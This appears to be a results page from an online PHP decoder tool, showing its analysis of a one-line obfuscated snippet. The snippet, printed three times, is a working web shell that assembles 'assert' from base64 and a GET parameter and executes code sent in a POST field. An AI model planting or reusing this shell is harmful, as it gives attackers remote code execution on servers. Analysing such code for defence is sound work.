Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['x']);?>abcabcabc..

Decoded Output download

<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['x']);?>abcabcabc

Did this file decode correctly?

Original Code

<?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['x']);?>abcabcabc

Function Calls

b'asser'Nonet 1
base64_decode 1

Variables

$c b'asser'Nonet

Stats

MD5 00afeee72b9bddd95145dafcf0354e8c
Eval Count 0
Decode Time 143 ms